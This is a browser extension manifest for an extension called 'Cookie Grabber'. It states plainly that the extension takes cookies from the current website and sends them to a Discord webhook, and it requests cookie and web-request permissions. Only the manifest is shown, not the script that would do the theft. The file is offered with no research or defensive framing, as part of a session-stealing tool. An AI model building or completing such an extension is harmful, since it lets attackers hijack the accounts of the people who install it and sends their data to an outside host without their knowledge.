{
    "manifest_version": 2,
    "name": "Cookie Grabber",
    "description": "Grabs cookies from the current website and sends them to a Discord webhook.",
    "version": "1.0",
    "permissions": [
      "cookies",
      "webRequest"
    ]
  }
  